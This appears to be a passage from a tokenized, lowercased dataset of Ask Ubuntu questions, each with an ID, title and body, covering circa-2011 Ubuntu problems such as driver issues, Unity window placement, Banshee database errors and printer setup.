/proc/acpi does n't exist ) . please let me know what i have to do to solve the issue , i want to get rid of acpi=off setting . thanks
47071	can not install 10.10 on new 32 gb ssd in dell mini 9	can not install 10.10 or any other distro on new 32 gb supertalentssd . it is recognized by bios , but error says : input/output error during write on dev/sda . installed 10.04 on 16 gb supertalent ssd earlier without problems . any assistance will be appreciated . thanks .
47076	usb boot problems	i try to install ubuntu 11.04 on my laptop using thumb drive , but it fails with though i use the standard startup disk creator utility . laptop model : dell studio 1536 what is the problem stdin : error 0 /init : line 7 : ca n't open /dev/sr0 : no medium found ... ... ... what is the problem , what did i wrong or what 's wrong with boot loader ? sultan
47079	what is the advantage to build unity from source	can somebody explain me what is the advantage to build something like unity from source ?
47081	is there an alternative to icq ?	i do n't mean any chat program that supports icq , like pidgin or empathy . if there is one fully written just for icq in ubuntu/linux . edited : the reason i want an alternative application , that is for some other programs like pidgin or empathy icq is just a part of the project . i want a full program just for icq .
47085	which graphics driver should i use on an asus n43 ?	i have a notebook ( asus n43 ) with a geforce gt435m graphics card . this card has the optimus technology . the notebook has a blue/white indicator which shows when the geforce is active or inactive , respectively . on windows it works perfectly , blue/off when idle , white/on when using firefox for example . on the other hand , when using ubuntu ( 10.10 , but upgrading to 11.04 ) it is always on even when i 'm doing nothing . i suppose this is a problem related with linux 's drivers right ? two questions : should i download and install nvidia driver from their website or stick with the one ubuntu comes with ? could the nvidia 's driver solve the optimus problem ? is there any simple way to get optimus working on ubuntu/linux ? i saw some websites with some projects ( bumblebee ) developing some drivers ... does it work ? is it stable ? [ update : ] i followed @ avilella 's instructions and everything went well i guess . but the led continues to be always white meaning that the graphic is always on . your example of google-chrome did n't work . the opengl gave me this results : $ glxgears running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 299 frames in 5.0 seconds = 59.631 fps $ optirun glxgears * starting bumblebee x server bumblebee /usr/local/bin/bumblebee-enablecard : 1 : ďż˝ďż˝ : not found [ ok ] 1445 frames in 5.0 seconds = 288.877 fps what does it mean ? what is that optirun ? what improvements should i notice ? so ... my problem still subsists .
47086	what 's the best way to update the linux kernel if i have no internet connection ?	i currently did a clean install of ubuntu lts 10.04 on my new laptop . after the installation , i attempted to do an update of the system only to find out that the 2 most important interfaces ( eth0 and wlan0 ) i can use to connect to the internet is non-existent . i then recalled that when i installed arch on this same laptop a few months back , i got the same obstacle . basically , it was because the kernel version does n't support the 2 interfaces yet . the atheros card ar8152 ( eth0 ) needs at least kernel version 2.6.37 and the broadcom device 4727 ( wlan0 ) also needs a higher kernel version . if i am not mistaken , the install cd i have for 10.04 has kernel version 2.6.32-xx . so i can not connect to the internet on my laptop . i need to know what the best approach is to update the linux kernel to the current version if i have no internet connection on the laptop . i can connect to the internet using a win7 machine . also note that i want to use the 10.04 release so upgrading to a newer ubuntu release is n't an option .
47090	why ca n't i connect to my launchpad ppa with quickly ?	can anyone make sence of the following output : confus @ confus : ~/prog/power-switch $ quickli configure ppa confus @ confus : ~/prog/power-switch $ quickly configure ppa traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/configure.py '' , line 66 , in < module > templatetools.handle_additional_parameters ( sys.argv , help , shell_completion , usage=usage ) file `` /usr/lib/python2.7/dist-packages/quickly/templatetools.py '' , line 51 , in handle_additional_parameters shell_completion ( args [ 2 : ] ) file `` /usr/share/quickly/templates/ubuntu-application/configure.py '' , line 61 , in shell_completion rv = packaging.shell_complete_ppa ( argv [ -1 ] ) file `` /usr/share/quickly/templates/ubuntu-application/internal/packaging.py '' , line 302 , in shell_complete_ppa launchpad = launchpadaccess.initialize_lpi ( false ) file `` /usr/lib/python2.7/dist-packages/quickly/launchpadaccess.py '' , line 91 , in initialize_lpi allow_access_levels= [ `` write_private '' ] ) file `` /usr/lib/pymodules/python2.7/launchpadlib/launchpad.py '' , line 538 , in login_with credential_save_failed , version ) file `` /usr/lib/pymodules/python2.7/launchpadlib/launchpad.py '' , line 341 , in _authorize_token_and_login authorization_engine.unique_consumer_id ) file `` /usr/lib/pymodules/python2.7/launchpadlib/credentials.py '' , line 273 , in load return self.do_load ( unique_key ) file `` /usr/lib/pymodules/python2.7/launchpadlib/credentials.py '' , line 322 , in do_load return credentials.from_string ( credential_string ) file `` /usr/lib/pymodules/python2.7/launchpadlib/credentials.py '' , line 89 , in from_string credentials.load ( stringio ( value ) ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/authorize/oauth.py '' , line 165 , in load credentials_file_version , 'consumer_key ' ) file `` /usr/lib/python2.7/configparser.py '' , line 610 , in get raise nooptionerror ( option , section ) configparser.nooptionerror : no option 'consumer_key ' in section : '1' none confus @ confus : ~/prog/power-switch $ quickli configure ppa none corresponding bug-report on launchpad : https : //bugs.launchpad.net/launchpadlib/+bug/793174
47095	how to create a video from images not like a slideshow ?	im looking for a software which creates a movie from a set of images unlike a slideshow from ffmpeg , imagination , openshot etc . looking more like a movie feature from picasa , video from the webapp etc
47096	reasons why to use and not to use an alpha , beta or rc release ?	seeing as there are many questions regarding alpha , beta or release candidates for ubuntu i wanted to know what are the several reasons for a new user ( or even an old user ) not to use this stages from ubuntu until its finished and the reasons to use them until they are finished . this includes 32-bit , 64-bit , desktop and server .
47100	mouse wheel scrolling too fast	i have done a clean natty install having bought a new ssd and find that in applications ( ahem ) such as minecraft , and in the default web browser firefox , the mouse scrolls too far . so for example in minecraft the mouse wheel jumps multiple items rather than one with each mouse wheel roll . with firefox the page leaps quite a distance with each mouse wheel roll . any ideas where i might adjust this ?
47101	setting up filezilla with gvim editor	i want to edit ftp files from filezilla , with gvim i open options > associated file types in filezilla and i have = . /usr/bin/gedit thtml /usr/bin/gedit php /usr/bin/gedit so i should replace by = . /usr/bin/vim.gnome thtml /usr/bin/vim.gnome php /usr/bin/vim.gnome html /usr/bin/vim.gnome is it correct ?
47114	no audio flash movies	i 've installed natty a few days ago and i 'm experience some issues with the audio . basically , i 'm not able to listen anything coming from flash movies ( such as youtube ) . this happen with both chromium and firefox ( i use only the first one ) and the errore i get in the stdout is : alsa lib pcm.c:2109 : ( snd_pcm_open_conf ) can not open shared library /usr/lib/alsa-lib/libasound_module_pcm_pulse.so i do n't know how to fix it . i found somewhere to install native x64 flash plugins , but somebody says it is not advisable . i did n't get this kind of issues with 10.10 i 've gotten before of natty . hence , what am i supposed to do ? thank you very much
47115	how can i use firefox 4 on an old ubuntu 7.10 laptop ?	i 've got a desktop with ubuntu 7.10 installed , and i would like to use the old firefox that comes with it and it 's the only one working for certain online banking pages , and use the new firefox 4 for newer html5 pages . how can i have both working side to side ? thank you
47123	how can i install gcc 4.6 side-by-side with the current version from the repositories ?	i have 4.5.2 installed from the ubuntu official repositories . i would like to install 4.6 as well to try out the c++0x features it brings . how can i do this without breaking my system ? i 'm fine with the newer being default , but also want to keep the older version .
47125	gimp windows placement when opened in unity	i have just installed natty narwhal replacing my lucid lynx system . i use gimp so much , and found that in unity , when opening gimp ( and actually any applications , i think ) , the windows placements are kind of less consistent compared to ubuntu classic . i used to place the toolbox window in the left side of desktop , the layers , channels , paths , undo - brushes , patterns , gradients window in the right side , and resize the main window till it filled the gap between the both windows , and the windows will open in that position when i open gimp . however , things seem to work differently under unity . when opening gimp , the windows are always pushed to the right ( looks like it is because of the launcher ) , even after i set them to fully occupy the desktop ( over or alongside the launcher ) and close it to 'save the configuration ' before reopen it . are there any workarounds or solutions on this ? i want gimp to be ready to be used without having to move the three windows to the desired place right after it is opened . thanks in advance .
47127	getting a weird message box on watching youtube videos ?	i am getting the message box shown in the screenshot below when watching videos on youtube using firefox 4.0.1 . also , adobe flash is crashing very often . it 's not only youtube , i can see this message on almost all streaming videos . i am running ubuntu 11.04 on a thinkpad x300 .
47130	recover ubuntu-desktop via live cd	i was trying to uninstall the package cairo-dock . and i think i 've uninstalled things i shouldnt . now my 10.04 only starts in text mode . what should i do to restore my gnome desktop ? is there any way to recover it via live cd ?
47133	how do i fix this giant gap in my toolbar ?	i 'm running ubuntu 10.04 i686 in virtualbox . i get this giant gap on my top toolbar and it 's driving me nuts . any way i can fix it ?
47136	putting back gnome-shell option on login screen	for some reason gnome-shell login option does not show anymore in the login screen . how may i add it back ? thanks !
47137	ubuntu 's 11.04 appearance	my ubuntu changed its appearance by itself ! i did n't like the new one , it 's gray and squared . my upper bar and files designs are all different ! how do i change it back to the original one ? please help ! !
47139	is it possible to tether internet between my android phone and a 3g hspda router ?	i wish to share my 3g connection with a router using my current android phone without having to buy a new sim card or a dongle of some sort . is this possible ? i am able to tether my phone making it a wifi hotspot but what i want is to only share the internet with a router . the reason i ask is because i have a small ubuntu pc in my car ( mini atx ) which i want to access from a android tablet . to be able to do this i need the tablet and the pc connected to a router so that i can forward port 5900 and use remote desktop . i also want internet whilst using remote desktop , thus i need the router to have and internet connection . this is a schematic of what i want to achieve : ? | -- > android pad 3g internet from phone < -- > 3g router < -- | | -- > pc any advice is much appreciated .
47144	any way to change wallpaper according to specific clock time ?	finding it quite hard to google this . between say 9 am and 6pm i want a certain wallpaper to be displayed , and between 6 pm to 12 am i want a different one . so i want it time-specific . any way to do this in ubuntu ?
47146	ca n't connect to wireless networks on a dell latitude d430	as stated above , i ca n't connect to my home wi-fi with natty but can with windows 7 . the strange thing is i that i have gotten it to connect to other password protected networks with natty , it 's just mine that it dos n't like . i am using a wpa2 pass-code with aes encryption and all other devises work fine on my network . laptop used is a dell latitude d430 .
47152	do i need desktopcouch-se ?	do i need desktopcouch-se service ? it seems that it is eating my thinkpad computing resources . please see below that powertop confirms this . `` ubuntu with no-effects '' is running on my thinkpad . please also take a look at the output of powertop and let me know if there are any unnecessary services are running .
47155	reorder files inside folder	i have about 30k songs in mp3 . i already organized/tagged them with musicbrainz picard . but picard made an excess of folders and subfolders inside each other because of the tags . what i need now is a script to do the following inside the main music folder : to read each subfolder and move all the mp3 files inside the subfolder 's folders to the main subfolder . for example : music - offspring - album 1 - 20 songs album 2 - 30 songs album 3 - 5 songs folder 1 - 2 songs folder 2 - 3 songs journey - song pack 1 - 2 songs packy 1 - 15 songs packy 2 - 20 songs packy 3 - 7 songs album 2 - 20 songs whatever 3 - 10 songs after script they would be like this : music - offspring - all songs inside this folder . not inside subfolders of offspring . journey - all songs inside this folder . not inside subfolders of journey . and so on.. so all the music for each subfolder of each music group should not have any more subfolders and all songs inside their respective sub-subfolders should be moved to the main sub-folder of the music group . so when i check music and i see the bee gees then i know that all the songs are right there and not inside some subfolder of bee gees . note - in some cases there are more than 20 recursive sub-folders . an example is : music/lady gaga/1/album/lady gaga/2/2/2/1/1/1/1/3/3album 2/lady gaga/1/1/1/song.mp3 . in this case i want the son inside music/lady gaga and eliminate the rest of the folders .
47162	how to disable the warning sound when closing firefox	i appreciate to be warned when i try to close firefox with multiple tabs open , but i really do n't want to hear the warning sound . how can i disable the warning sound for firefox ? thanks in advance .
47168	sync music from banshee via ssh to android device	i want to transfer my music to my android device via ssh . i do that wireless because i do not always want to plugin the cable to sync some files . is there a way banshee can recognize my android device over ssh ? or do you have any other solution to make that work ?
47171	stand-alone flash projector does n't take relative paths	i 'm a flash developer . i developed a flash app which i want to distribute on all platforms . i recently installed ubuntu and i 'm using the adobe flash player 10 to generate a stand-alone linux projector from my .swf file . however , the generated projector seems to have problems dealing with relative paths . the app needs to load a lot of content dynamically from the disk ( images , sound files ) . normally , i use relative path names such as ./myfolder/ to tell my app where to find those files . this ceases to work with the stand-alone player . the app ca n't find the files specified this way . it will find the files if i specify them in an absolute fashion such as /home/myuser/desktop/myapp/myfolder/ but this is out of the question for something that needs to be distributed . am i doing something wrong ? is there a syntax for relative paths i 'm not aware of ? the projector seems to think it 's being executed in the path file : ///myapp.swf that does n't sound right . is there a way to tell an executable in which base-directory it should be executed ? is there a way around it ? for example , launching the universal flash player and loading the swf manually seems to work . can i create a shortcut for this ? on windows i could create a shortcut to something like flashplayer.exe myapp.swf is there an equivalent in linux ? in general : any ideas for workarounds ?
47175	app that enables hotkeys to half-screen a window ?	on windows i can hold down the windows key and press left to make my current window take up the left half of the screen . is there a similar app for ubuntu ?
47176	why am i unable to mount file shares between two ubuntu machines ?	i have shared my videos folder in the home directory of my netbook and am attempting to access it from the new laptop i just got . samba is installed on both machines , as well as smbclient . file sharing is enabled and i can see the netbook in the `` network '' entry of nautilus , but when i attempt to open the computer to access the shared folder i receive the error : '' unable to mount location dbus error org.freedesktop.dbus.error.noreply : message did no receive a reply ( timeoutby message bus ) '' a timeout error seems odd since it appears instantly . this occurs on both machines ( e.g . i share a file on the laptop and attempt to open it from the netbook ) .
47178	bootable dual os flashdrive ?	i want to completely erase my hard drive and start again , i want to install both ubuntu ( 11.04 ) and windows 7 . i have the iso for both . because i do not have any dvd 's i want to do this using my only usb drive . i do not want to have to install an os from the flashdrive , then go into it and write the second os to the flash drive , so is it possible to make a bootable flash drive that i can choose to install either windows or ubuntu ?
47179	i 'm looking for an lrc files editor	i use lrc files throw the `` osd lyrics '' program which allows to display lyrics stored in the *.lrc files . for those who do n't know , lrc files contain time tags which allow to display the lyrics synchronised with the current played song . it 's a pain to create lrc file with a simple text editor . so i 'm wondering if anyone knows a program to edit the time tags in the lrc files ? thanks p.s . could anyone with enough reputation create and add the lrc tag to this post ?
47182	winbind installation error	i get this error everytime i install something in ubuntu 11.10 'e : winbind : subprocess installed post-installation script returned error exit status 1' fortunately the programs still install . how do i fix this problem ? ?
47184	rugged effect on trash and workspace viewer	there are 2 elements ( maybe more ) than when i right click on them they give a `` rugged '' effect to the menu . so far the only 2 i have found are trash and workspace viewer . the image shows how i see the trash when i right click on it : how can i fix this . am using an nvidia card . it looks like this on gnome classic ( both version with and without effects ) .
47186	is there a way to change user picture in xubuntu , and actually display it on login ?	i am aware that the way to change user picture , is creating a .face file on /home ... the thing is , this only works when one checks the users and groups on system directory ... when it 's time to login , nothing is displayed , but the default `` faceless '' icon ... why is this ? i am using xubuntu 11.04
47188	would upgrading processors/motherboards stop my 10.04 lucid from working ?	or will i have to reinstall the operating system , etc ? i 'm thinking of upgrading a core 2 quad to either an i7 or a phenom , which also involve changing motherboards . what considerations with regards to the installed ubuntu distribution are there ? would it magically recognize the new hardware and just work as is , or will a new installation need to be done ?
47189	how can i force the unity launcher to start programs in a window which is not maximised	bug https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/704187/ means wine programs can not be run maximised because there is a mouse displacement . unity usually seems to start programs maximised . so is there any command line i can put in the unity launcher file ( .desktop file ) or any other way to ensure the program is not started maximised and preferably specify the starting window size/position or that it is the same as when it was last used ?
47192	will ubuntu 11.10 use the gnome 3 system settings ?	if so , ubuntu will be lack of customization like gnome 3 ? ?
47194	backing up mysql database ( up to a month or while theres space )	i am backing up my files using deja-dup . but how do i do the same with mysql ? i see some cron scripts , but that will keep backups forever . i thought the feature of deja-dup that allows backups to be kept up to a month or while theres space . is there something similar with mysql ?
47196	adding apt-get packages to a usb boot drive ( and storing them on the drive ) ?	i want to compile some 3rd party software and install it on a bootable usb drive ... there are several packages that i need to install with apt-get before i compile it . how could i store the apt-get packages on the thumb drive so that the 3rd party application i compile will work on the usb drive ?
47201	unity is slow and laggy on my pc	i love unity but its performance is slow and it always lags when i multi task . i have 512 mb of ram . please help me , i want to do my work smoothly with unity .
47205	unable to install ease due to missing dependencies	getting the following error message while installing ease even the required packages are there . please see below for full details . please let me know what went wrong . ... configure : error : package requirements ( clutter-gst-1.0 clutter-gtk-0.10 > = 0.10 gee-1.0 gmodule-2.0 json-glib-1.0 > = 0.7.6 libarchive poppler-glib rest-0.6 rest-extras-0.6 unique-1.0 ) were not met : no package 'clutter-gst-1.0 ' found no package 'gee-1.0 ' found no package 'poppler-glib ' found no package 'rest-0.6 ' found no package 'rest-extras-0.6 ' found no package 'unique-1.0 ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables ease_cflags and ease_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - $ apt-cache policy clutter-gst-1.0 gir1.2-clutter-gst-1.0 : installed : ( none ) candidate : 1.3.6-1 version table : 1.3.6-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/universe i386 packages libclutter-gst-1.0-0 : installed : 1.3.6-1 candidate : 1.3.6-1 version table : *** 1.3.6-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/universe i386 packages 100 /var/lib/dpkg/status 1.2.0-0ppa1natty0 0 500 http : //ppa.launchpad.net/natesm/ease/ubuntu/ natty/main i386 packages libclutter-gst-1.0-dbg : installed : ( none ) candidate : 1.3.6-1 version table : 1.3.6-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/universe i386 packages 1.2.0-0ppa1natty0 0 500 http : //ppa.launchpad.net/natesm/ease/ubuntu/ natty/main i386 packages libclutter-gst-1.0-dev : installed : ( none ) candidate : 1.2.0-0ppa1natty0 version table : 1.2.0-0ppa1natty0 500 http : //ppa.launchpad.net/natesm/ease/ubuntu/ natty/main i386 packages
47208	how to stop thunar being default file browser	on a relatively new 11.04 installation thunar has become the default file browser simply by using it ! whilst i can open nautilus easily enough , i 'd rather it remained as the default , especially when i choose to view files in dual pane . the only action that i can pinpoint that might have given over my files and folders to thunar is making nautilus into nautilus-elementary ( oh and unity carked it so i reverted rather unwillingly to classic , glad i did it is so much more stable and this is my production machine and unity acts as if it is early alpha as far as i can tell ! )
47209	how do i copy an existing hard disc to a new one so i can boot off the new disc ?	i currently have a failing hard drive which is the only hard drive in the machine . i have just bought a new hard drive to replace it , and my plan is to copy the contents of the old drive onto the new one , and then replace the old drive in the machine with the new one . i presumably ca n't just copy the whole directory structure ( or can i ) ? what do i need to do to manage this , assuming it is possible ? is there a utility to do this for me ? ( the old drive is hopefully good for a few more hours . ) ( i hope by this means to keep all the software and configuration files as they are , to avoid having to re-install everything . can that be done ? )
47213	how do i troubleshoot s-video + audio jack output not working ?	i connect my laptop to my tv using s-video + audio jack . this worked perfectly in 10.10 but has stopped working in 11.04 . i have tried switching from ubuntu ( unity ) to ubuntu ( no effects ) and ubuntu classic , but it still does n't work . ubuntu recognises that a second monitor is attached and picks the correct resolution . the tv screen remains blue as though there is no signal . the audio does n't come through either . i have checked the cables are plugged in correctly , and the connection into the tv works ( replacing the laptop with a dvd player works ) . i am using an intel graphics card , not nvidia . any suggestions on further troubleshooting steps ?
47216	how to disable kde wallet ?	i 'm using ubuntu maverick ( gnome ) , a month ago i updated like usual whenever update manager informed me of new updates . the thing that happened is that a program called kdewallet got installed on my machine , and every time i try to do something that requires password like svn , it pops up and starts getting really annoying . how can i get rid of it ? it 's not even in the synaptic package manager .
47219	enable urlbar 's `` one click selects all '' in chromium	i hate the `` normal way of browsing '' in linux that forces you to triple click to select the whole navigation bar content . i can easily change this in firefox 's about : config changing the boolean to parameter `` one click selects all '' to true . what about chromium - google chrome ? is there a trick or a workaround ?
47221	are the ubuntu one mobile contacts saved locally on my phone ?	i have installed the u1 contacts sync on my android and successfully synced all 500 contacts . are the synced contacts saved locally on my phones memory ?
47225	turn a mac mini g4 - 1.4 ghz , 2 gb ram - into a home server	i 'd like to build a small home server ( backups , download station and media server with dlna ) . anybody knows if this spare mac i have is worth for the specified jobs using ubuntu server ( i 've already found the working iso ) or it 's just a waste of time keeping in mind that i 'd need to stream using dlna 1080p movies ? i ca n't predict its performance because of my poor experience on risc processors .
47226	unity application menus and title bar issue with wine applications	at the moment , i get two title bars for maximized applications which run through wine . is there a way to get rid of one of them ( the `` non-unity '' one , obviously ) ? is there a way to get the application menu for wine applications ?
47232	shader problems : heroes of newerth	i am getting strange `` artifacts '' in 3d games such as heroes of newerth . i have ubuntu natty , i am not running the propriety graphics driver as i am using gnome3 and the driver does not work well . i have a dell inspiron 1545 . the artifacts are almost tolerable , but the game quite often also crashes , with no warning or error . how can i fix this , or ( if it 's a bug ) how do i report this ?
47234	how to keep a graphical application running , even if it crashes ?	i use gnome do as a launcher for most things . i have it set to run on login and for most of the time it sits in the background waiting for me to mash a keyboard shortcut . about once a week , it falls over . i mash my shortcut and nothing happens . i have to re-launch it . it 's not amazingly annoying but i would like to know if there are any good ways to make sure desktop applications keep running forever . if they die , they get re-launched ( perhaps with a crash timeout so if it crashes on load , it does n't keep trying to run it over and over and over again ) . i know some applications do this . on gnome2 , if gnome-panel is n't running , the system forces it to load . is there a simple way of tapping into this logic ( of course , without breaking gnome ) . i do n't want this question to be too specific to gnome do or even gnome because i have more than one application for a solution ( i run boxee on an openbox desktop on our media centre ) and i 'm sure other people all have their own issues they 'd like to fix through something like this .
47237	forcibly underclocking at night	my desktop stays on all the time . it acts as a server and also performs other semi-essential household tasks . during the day it uses the ondemand cpu setting . this essentially just scales the cpu frequency as it needs it and this works really well for me . at night time , it flits around . of course most of the time it 's idling along at a low power but occasionally , it 'll ramp up to do something . i would rather it stayed on powersave and tasks were just forced to take a little longer to complete . additionally , i have a nvidia card ( gtx 580 ) which can consume about the same amount of power as a small african village uses in a year when it wants to ( glares at minecraft ) . for unknown reasons ( undoubtedly something happening on the desktop ) , this ramps up , the fans sound like they 're charging up to fire lasers into space . at night time , i 'd like to underclock the card as far as it 'll go . i 've considered a simple root-run cron script to push these through but my working hours are variable . last week i had a near-70 hour working week so i was up very early and still up very late , every day . if the system was honking along at super-underclock mode , i would have been furious . is there something i could do to say , `` underclock if : it 's between 10pm and 9am there has n't been any mouse/keyboard activity for 10 minutes there is n't a movie playing if one of those conditions is n't true , the underclock needs to revert instantly . i do n't want to wait for a cron-script to come along to wake the computer up from its slumber . similarly , as soon as all of those do become true , it should go back to sleep . what are my options ?
47238	how to enable file manager to handle desktop after removing gnome 3 ?	i am student from indonesia . i 've installed gnome 3 from latest ppa and used instructions written by user jon : how do i install the latest version of gnome 3 ? and after that , i removed gnome 3 and used instructions from above question too . but in gnome 3 , right-click ca n't do in desktop ( file manager does not handle desktop ) and it 's also exists to my old unity desktop : ( how i can fix it ? thanks so much . hmm , still not working : ( thanks for the answer : d by default in gnome 3 , file manager does not handle the desktop , but i using gnome-tweak-tool for fix it ... but before i removed gnome 3 , i return the initial setting 'file manager does not handle desktop' and the setting was also influential in unity : ( any others ? ?
47240	how can i enable java in chromium ?	i 've got java working on firefox in ubuntu 11.04 , but using the same page on chromium tells me java can not be found . how can i enable java on chromium in my ubuntu 11.04 ?
47243	banshee fails with fatal error about database disk image malformed	i 'm trying to use banshee , but when i launch it , it shows this ( fatal error ) that seems releated to mono ( which is installed , but maybe not working.. ) si ă¨ verificata un eccezione non gestita : sqlite error 11 : database disk image is malformed ( sql : begin transaction ; delete from coresmartplaylistentries where smartplaylistid in ( select smartplaylistid from coresmartplaylists where istemporary = 1 ) ; delete from coresmartplaylists where istemporary = 1 ; commit transaction ) at hyena.data.sqlite.connection.checkerror ( int32 errorcode , system.string sql ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.sqlite.connection.execute ( system.string sql ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.sqlite.hyenasqlitecommand.execute ( hyena.data.sqlite.hyenasqliteconnection hconnection , hyena.data.sqlite.connection connection ) [ 0x00000 ] in < filename unknown > :0 exception has been thrown by the target of an invocation . at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.activator.createinstance ( system.type type , boolean nonpublic ) [ 0x00000 ] in < filename unknown > :0 at system.activator.createinstance ( system.type type ) [ 0x00000 ] in < filename unknown > :0 at banshee.gui.gtkbaseclient.startup ( ) [ 0x00000 ] in < filename unknown > :0 at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) [ 0x00000 ] in < filename unknown > :0 .net version : 2.0.50727.1433 os version : unix 2.6.39.0 assembly version information : gkeyfile-sharp ( 1.0.0.0 ) banshee.audiocd ( 2.0.0.0 ) banshee.coverart ( 2.0.0.0 ) banshee.mpris ( 2.0.0.0 ) migo ( 2.0.0.0 ) banshee.podcasting ( 2.0.0.0 ) banshee.dap ( 2.0.0.0 ) banshee.multimediakeys ( 2.0.0.0 ) banshee.bpm ( 2.0.0.0 ) banshee.webbrowser ( 2.0.0.0 ) banshee.wikipedia ( 2.0.0.0 ) pango-sharp ( 2.12.0.0 ) banshee.fixup ( 2.0.0.0 ) banshee.widgets ( 2.0.0.0 ) gio-sharp ( 2.14.0.0 ) gudev-sharp ( 1.0.0.0 ) banshee.gio ( 2.0.0.0 ) banshee.gstreamer ( 2.0.0.0 ) system.configuration ( 2.0.0.0 ) ndesk.dbus.glib ( 1.0.0.0 ) gconf-sharp ( 2.24.0.0 ) banshee.gnome ( 2.0.0.0 ) banshee.nowplaying ( 2.0.0.0 ) mono.cairo ( 2.0.0.0 ) system.xml ( 2.0.0.0 ) banshee.core ( 2.0.0.0 ) hyena.data.sqlite ( 2.0.0.0 ) system.core ( 3.5.0.0 ) gdk-sharp ( 2.12.0.0 ) mono.addins ( 0.4.0.0 ) atk-sharp ( 2.12.0.0 ) hyena.gui ( 2.0.0.0 ) gtk-sharp ( 2.12.0.0 ) banshee.thickclient ( 2.0.0.0 ) nereid ( 2.0.0.0 ) ndesk.dbus.proxies ( 0.0.0.0 ) mono.posix ( 2.0.0.0 ) hyena ( 2.0.0.0 ) ndesk.dbus ( 1.0.0.0 ) glib-sharp ( 2.12.0.0 ) system ( 2.0.0.0 ) banshee.services ( 2.0.0.0 ) banshee ( 2.0.0.0 ) mscorlib ( 2.0.0.0 ) platform information : linux 2.6.39-0-generic x86_64 x86_64 gnu/linux disribution information : [ /etc/lsb-release ] distrib_id=ubuntu distrib_release=11.04 distrib_codename=natty distrib_description= '' ubuntu 11.04 '' [ /etc/debian_version ] squeeze/sid what can i try ? i 've tried to reinstalled both banshee and mono .
47247	add ntfs partition to live usb	if i add an ntfs partition to my usb , will it be accessible from both windows and ubuntu ?
47249	kpackagekit stuck with ttf-mscorefonts-installer package	when i try to install any package or even apply updates , the installer try to install ttf-mscorefonts-installer package at the end and fails with error : one of the selected packages failed to install correctly . more information is available in the detailed report . subprocess installed post-installation script returned error exit status 30 how can i get rid of this package or get it installed ? i have seen other similar questions here but non of them solved my problem . running sudo dpkg -- configure-a displays a dialog asking for the proxy and when i select it shows again and again ! ! note : the mentioned package gets installed by wine but after i update wine i usually uninstall it because it messes up the fonts of the system .
47259	best way to dedupe my thunderbird addressbook ?	i 've got a ton of duplicate contacts in my thunderbird addressbook . i do n't want to share them with google , but i do want to find a way to de-dupe them . there was a duplicate contact manager plug in , but it seems to have been abandoned . can i do this at the commandline ?
47260	where is vsftpd.conf ?	i have a 11.04 x86 server . i ran sudo apt-get install vsftpd and that was successful . but i can not find the vsftpd.conf file anywhere . i thought it was supposed to be in /etc/vsftpd.conf .
47265	what software can i use to search for and applying missing tags to my music collection ?	can i search for missing tags with musicbrainz picard or some other application ? my music folder is ~80 gb and i want the application to show me all missing tags ( and hopefully fix them by retrieving tag data from freedb or amazon.com ) .
47270	which finance software would you recommend ?	i am trying to replace software which i used on windows/mac . know i am looking for software , which helps me track my finances and plan e.g . budgets etc . is there any software you would recommend for ubuntu ? best would be a cross platform thing , but if it is a very good one , a ubuntu/lunux specific one , would help , too .
47272	why am i asked for my password when i want to mount a drive	i am asked for my password ( sudo , i guess ) whenever i want to mount an internal drive/partition . why is that ? also , its named like /media/7013bc1d-b3a2-4df6-8c85-828ced85ef0e how can i get something more meaningful ?
47277	what 's the best tcp congestion avoidance algorithm to an adsl2+ connection ?	i 've read some wikis and pages about tcp congestion avoidance algorithm but i do n't sure about the response to this question : what 's the best tcp congestion avoidance algorithm to an adsl2+ connection ? actually i use cubic , is it the best option ?
47285	flushing notify-osd queue ?	i use 11.04 , classic and sometimes the notifications just pile up , e.g . when i open thunderbird , and login to empathy , and start playing my music , all at once . i can see messages popping for 15 minutes or more . the ubuntu wiki on notify-osd mentions flood prevention . why isnt it being applied in this case ? this overflow/flood didnt happen in 10.04 . i tried killing and restarting the notify-osd process , but then new notifications dont show up . the me-menu hangs up , and i have to log out to make it alright . is this a bug ? how do i flush the queue ? is there any workaround ? edit : i was able grab a screenshot . and now , all of a sudden , the messages have stopped popping .
47286	installing canon lbp5000 laserjet printer	i have the following setup : ubuntu natty ( 11.04 ) server edition installed printer canon lbp5000 laserjet cups , using the web interface because i have no gui . im operating the system by ssh via my network my problem : it just does n't want to print , im trying to print a test page but nothing is happing . after a while it gives me a error like ca n't connect to ccpd : connection refused or ccp send_data error , exit my attempts : i have followed this guide : https : //help.ubuntu.com/community/canoncaptdrv190 . the command `` ccpd status '' gives me the correct output : canon printer daemon for cups : ccpd : 4171 4170 i have tried this script : http : //radu.cotescu.com/how-to-install-canon-lbp-printers-in-ubuntu/ , same results can someone help me with this , cause im really out of options .
47287	is there a way to make banshee show current song playing in empathy ?	is there a way to make banshee show the current song playing in empathy ? i remember rhythmbox had this functionality . but i do n't even see an extra plugins option in banshee . all i see is the extensions in preferences . is there some way to achieve what i need ? i am on 11.04 btw
47290	how to auto-arrange desktop icons ?	how do i enable auto-arrange ( not just `` auto-align '' ) for desktop icons , like in windows ?
